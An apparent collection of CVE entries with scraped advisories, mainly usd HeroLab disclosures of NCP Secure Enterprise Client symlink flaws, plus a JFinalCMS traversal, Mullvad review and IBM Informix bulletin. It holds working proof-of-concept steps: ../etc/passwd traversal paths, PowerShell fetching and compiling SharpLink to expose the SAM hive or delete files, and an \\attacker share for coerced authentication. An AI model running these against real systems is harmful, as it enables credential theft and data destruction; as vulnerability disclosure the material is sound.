JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.

在/common/down/file路由功能下，可以对参数fileKey设计带有恶意性质内容的文件名实现目录穿越，从而下载已知目录内的任意已知文件名，且该行为并不需要进行登录。

    poc:
    Linux:   /../../../../../../../etc/passwd
    Windows:  /../../../../../../../test.txt （test.txt为测试用的在根目录下的文件）

CVE-2023-50449: JFinalCMS存在未授权目录遍历漏洞 · Issue #I7WGC6 · 樱木/JFinalCMS - Gitee.com

An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM.

> _Reviewable_ status: 9 of 14 files reviewed, 3 unresolved discussions (waiting on @Jontified)

_mullvad-paths/src/windows.rs line 146 at r3 (raw file):_

>     // Authenticated users SID https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
>     let (authenticated\_users\_ea, authenticated\_users\_psid) =
>         match create\_explicit\_access("S-1-5-11", GENERIC\_READ) {

This is fine, but it seems like we could have used CreateWellKnownSid(WinAuthenticatedUserSid, ...) and CreateWellKnownSid(WinBuiltinAdministratorsSid, ...) here.

A nice thing about it is that we allocate the memory ourselves, so most of the LocalFrees go away, and we only have to use plain arrays or Vecs. Cleaner, probably?

Though I vaguely recall that this did not work for some reason.

_mullvad-paths/src/windows.rs line 217 at r3 (raw file):_

>     let sid\_wide\_str = get\_wide\_str(sid\_wide\_str);
>     let mut psid = ptr::null\_mut();
>     if 0 == unsafe { ConvertStringSidToSidW(sid\_wide\_str.as\_ptr(), &mut psid) } {

I think we should avoid Yoda conditions, as they're inconsistent with our general code style. The point of these is mainly to prevent accidental assignment, which isn't relevant for if statements in Rust.

CVE-2023-50446: Set permissions on log directory by Jontified · Pull Request #5398 · mullvad/mullvadvpn-app

The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker's fingerprint.

CVE-2023-50430: A Touch of Pwn - Part I

In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023.

CVE-2023-50428: Common Vulnerabilities and Exposures - Bitcoin Wiki

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link.

**usd-2022-0005 | NCP Secure Enterprise Client - Insecure Registry Export**

**Advisory ID:** usd-2022-0005  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure Registry Export  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _Windows Registry_ is a central storage location for configuration settings on the _Windows_ operating system. Data that is stored  
within the _Windows Registry_ is utilized by several different components, like desktop applications, services, device drivers and also  
the kernel itself. Several locations within the _Windows Registry_ are known to contain sensitive information. The probably most well  
known example is the **HKLM\\SAM** hive, that stores hashed credentials of local user accounts.

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. Within this diagnostic information, the _NCP Secure Enterprise_ client also exports information  
from the _Windows Registry_. During this export, _Registry symbolic links_ are followed and may allow to redirect the export to an arbitrary  
location within the _Windows Registry_.

For such an attack to work, a low privileged user accounts need to be able to create _Registry symbolic links_ within the exported _Registry  
keys_. In the case of the _NCP Secure Enterprise_ client, this is possible, since the client exports all keys under **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services\*_recursively. On a default installation of_ Windows_, this_ Registry key _usually contains some keys where low privileged user accounts  
can create_ subkeys_. Newly created_ subkeys _are owned by the creating user and it is possible to create_ Registry symbolic links_within them that point to arbitrary_ Registry _locations. Since the_ symlink\* originates from a trusted** HKLM __hive, it is not restricted  
by_ Microsoft's_ protection features for _Registry symbolic links_.

**Proof of Concept**

The first step is finding a _Registry key_ within **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services** that is writable for low privileged  
user accounts. Corresponding keys might vary for different installations, but on our test systems it was always possible to find at least  
one such key. In the following we use the key **HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment** which seems to be available and allows  
the creation of _subkeys_ on most installations.

Within this _Registry key_ we now create a _symbolic link_ pointing to **HKLM\\SAM**

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> \[de.usd.SharpLink.RegistryLink\]::CreateKey("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB")  
\[+\] Creating registry key: HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB  
\[+\] Registry key was successfully created.  
PS C:\\> $r \= New-Object de.usd.SharpLink.RegistryLink("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK", "HKLM\\SAM")  
PS C:\\> $r.Open()  
\[+\] Creating registry key: \\Registry\\Machine\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK  
\[+\] Assigning symlink property pointing to: \\Registry\\Machine\\SAM  
\[+\] RegistryLink setup successful!

After the _Registry symbolic link_ is setup, one can start the _Support Assistant_ using the _NCP Secure Enterprise_ client tray icon  
(upper right inside the _Help_ menu). After the _Support Assistant_ was started, it collects support information from the operating system:

The collected files can be viewed either from the _Support Assistant_ directly or by inspecting them in **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*\*.  
Within the** Services.reg **file, one can find the export of the** HKLM\\SAM\*\* hive:

**Fix**

During the collection of support information from the operating system, the _NCP Secure Enterprise_ client software should impersonate  
the user that started the _Support Assistant_. This way, only information that the invoking user is allowed to read can be obtained.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28871: Security Advisory usd-2022-0005 | usd HeroLab

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0002 | NCP Secure Enterprise Client - Arbitrary File Delete**

**Advisory ID:** usd-2022-0002  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Delete  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. The corresponding information is gathered by high privileged services and stored within the directory  
__C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_. Since this directory is fully user controlled, a low privileged user can create_ symbolic links_within it. This can be used to trick the_ NCP Secure Enterprise\* client to delete arbitrary files on the operating system.

**Proof of Concept**

To perform the arbitrary file delete, the following steps are necessary:

1.  Start the _Support Assistant_ and wait until all diagnostic information has been collected.
2.  Create a _symbolic link_ that originates from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
    and points to the targeted file.
3.  Abort the _Support Assistant_ and restart it.

After these steps have been executed, the targeted file should be deleted. In the following, we demonstrate  
each of the above mentioned steps.

First we start the _Support Assistant_ by using the tray icon of the _NCP Secure Enterprise_ client. The _Support Assistant_  
feature can be found in the upper right of the graphical user interface within the _Help_ menu.

After the diagnostic information has been collected, we create a _symbolic link_ pointing from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
to the well known **C:\\Windows\\win.ini** file.

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\win.ini")  
PS C:\\> $s.Open()  
\[!\] Junction directory C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport is not empty. Delete files? (y/N) y  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\win.ini  
\[+\] Symlink setup successfully.

Now the _Support Assistant_ is aborted and restarted. After this action has been performed, the **win.ini** does no longer exist.

PS C:\\> dir C:\\Windows\\win.ini  
dir : Der Pfad "C:\\Windows\\win.ini" kann nicht gefunden werden, da er nicht vorhanden ist.  
In Zeile:1 Zeichen:1  
+ dir C:\\Windows\\win.ini  
+ \~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\\Windows\\win.ini:String) \[Get-ChildItem\], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

**Fix**

It is assumed that the _NCP Secure Enterprise_ client checks for already existing diagnostic files before starting  
the _Support Assistant_ and attempts to delete them. This delete operation occurs with high privileges, resulting  
in the vulnerability. Instead, the delete operation should be performed while impersonating the invoking user account.  
This prevents the deletion of files the invoking user has insufficient permissions for.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is realesed
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28868: Security Advisory usd-2022-0002 | usd HeroLab

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers read the contents of arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0003 | NCP Secure Enterprise Client - Arbitrary File Read**

**Advisory ID:** usd-2022-0003  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Read  
**Security Risk:** High  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. After the corresponding information was collected, users can inspect the contents of the collected  
files within the graphical user interface of the _NCP_ application. Despite the graphical user interface runs with the permissions of the  
current user, inspecting a diagnostic file causes a high privileged service to read the contents of it. After reading, the contents are send to  
the graphical user interface of the _NCP_ application and displayed to the invoking user.

After the _Support Assistant_ has collected the diagnostic files, they are stored within the directory __C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_.  
This is also the directory where the high privileged service obtains the file contents from when files are inspected within the graphical  
user interface. Since the directory is fully user controlled, low privileged users can use a_ symbolic link\* to redirect the read operation to  
an arbitrary target.

**Proof of Concept**

The first step is to start the _Support Assistant_ within the tray icon of the _NCP Secure Enterprise_ client. The corresponding function  
can be found in the upper right of the graphical user interface under the _Help_ menu. After the _Support Assistant_ has collected the  
diagnostic information, the corresponding files are displayed within the graphical user interface:

Now it is possible to replace one of the files with a _symbolic link_ to an arbitrary target. In the following listing we replace the  
file **C:\\Users\\\\AppData\\Local\\Temp\\NCPSupport\\services.txt** with a _symbolic link_ pointing to **C:\\Windows\\CCM\\CcmEval.xml**.  
Moreover, we demonstrate that the target file is not readable for a low privileged user account:

PS C:\\> type C:\\Windows\\CCM\\CcmEval.xml  
type : Der Zugriff auf den Pfad "C:\\Windows\\CCM\\CcmEval.xml" wurde verweigert.  
In Zeile:1 Zeichen:1  
+ type C:\\Windows\\CCM\\CcmEval.xml  
+ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    + CategoryInfo          : PermissionDenied: (C:\\Windows\\CCM\\CcmEval.xml:String) \[Get-Content\], UnauthorizedAccessException    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommandPS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\CCM\\CcmEval.xml")  
PS C:\\> $s.Open()  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\CCM\\CcmEval.xml  
\[+\] Symlink setup successfully.

Now it is time to inspect the file **services.txt** within the _Support Assistant_ graphical user interface.  
Clicking the corresponding file twice shows the contents of the targeted file:

**Fix**

It is not evident why a high privileged service is used to display the obtained diagnostic information. The read operation  
should be performed by the low privileged process instead, which also draws the graphical user interface.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28869: Security Advisory usd-2022-0003 | usd HeroLab

Insecure File Permissions in Support Assistant in NCP Secure Enterprise Client before 12.22 allow attackers to write to configuration files from low-privileged user accounts.

**usd-2022-0004 | NCP Secure Enterprise Client - Insecure File Permissions**

**Advisory ID:** usd-2022-0004  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure File Permissions  
**Security Risk:** Medium  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client stores it's configuration files within the directory **C:\\\\ProgramData\\\\NCP\\\\SecureClient**, which grants  
low privileged user accounts write access to most resources. Attackers can abuse this configuration in different ways as demonstrated  
in the _Proof of Concept_ section below:

**Proof of Concept**

This section contains proof of concepts for some of the writable resources:

**cacerts**

Since the folder **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\cacerts** is writable for low privileged user accounts, it is possible to add new _CA_  
certificates that may allow connections to untrusted endpoints:

**cbo.ini**

The file **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\cbo.ini** is also writable for low privileged user accounts. This file  
can be used to configure custom branding of the _NCP Secure Enterprise_ client by specifying the path to the desired theme  
files. By specifying the address of a network share instead, it is possible to coerce a remote authentication by each user  
that logs in on the prepared workstation. Furthermore, since the _NCP Secure Enterprise_ client starts on startup, an remote  
authentication of the machine account can be coerced.

\[GENERAL\]  
Enabled\=1\[DEUTSCH\]  
Picture\=\\\\\\\\attacker\\\\share\\\\test.png  
HtmlLocal\=%BaseDataDir%\\\\CustomBrandingOption\\\\de\\\\bla.html\[ENGLISH\]  
Picture\=\\\\\\\\attacker\\\\share\\\\test.png  
HtmlLocal\=%BaseDataDir%\\\\CustomBrandingOption\\\\en\\\\bla.html

**ncpmon.ini**

The file **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\ncpmon.ini** contains several different configuration settings.  
One of them is the **LogPath** setting within the _Gina_ section. Since the file is writable by low privileged user  
accounts, it is possible to set the **LogPath** to an arbitrary directory.

\[GENERAL\]  
...SNIP...\[GINA\]  
DisableGinaClient\=0  
LogLevel\=9  
LogPath\=C:\\\\

The configuration is then used by a high privileged service to write into the corresponding location:

C:\\\\>dir  
 Datenträger in Laufwerk C: ist Windows   Verzeichnis von C:\\\\   05.05.2021  10:09    <DIR>          Program Files  
   05.05.2021  10:09    <DIR>          Program Files (x86)  
   05.05.2021  10:09    <DIR>          Users  
   05.05.2021  10:09    <DIR>          Windows  
   30.11.2021  10:51         1.960.248 NcpGinaLog.txt

Apart form the above mentioned issues, other attacks may be possible. The file **extdial.conf** contains e.g.  
the filenames of _dynamic linked library_ (_DLL_) files which could may lead to privilege escalation vulnerabilities  
on certain setups.

**Fix**

The contents of the configuration folder should be reviewed and more restrictive permissions should be applied  
to files that store sensitive configuration items. Low privileged user accounts should only be allowed to modify  
configuration options that do not affect the security of the operating system.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28870: Security Advisory usd-2022-0004 | usd HeroLab

The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites.

CVE-2023-28874: Seafile Community Edition - Seafile Admin Manual


IBM Informix Dynamic Server 12.10 and 14.10 cdr is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251206.



**Security Bulletin**

  

**Summary**

IBM Informix archecker, cdr, and onsmsync are vulnerable to heap buffer overflow when invoked with invalid parameters.

**Vulnerability Details**

**CVEID:**   CVE-2023-28527  
**DESCRIPTION:**   IBM Informix cdr is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/251206 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-28526  
**DESCRIPTION:**   IBM Informix archecker is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/251204 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-28523  
**DESCRIPTION:**   IBM Informix onsmsync is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250753 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Informix Dynamic Server

12.10

IBM Informix Dynamic Server

14.10

IBM Informix Dynamic Server on Cloud Pak for Data

All

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

04 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGU8G","label":"Informix Servers"},"Component":"IBM Informix Dynamic Server, IBM Informix Dynamic Server on Cloud Pak for Data","Platform":\[{"code":"PF051","label":"Linux on IBM Z Systems"},{"code":"PF027","label":"Solaris"},{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF016","label":"Linux"},{"code":"PF031","label":"Ubuntu"},{"code":"PF043","label":"Red Hat"},{"code":"PF048","label":"SUSE"},{"code":"PF033","label":"Windows"}\],"Version":"14.10, 4.7","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

Tag

#windows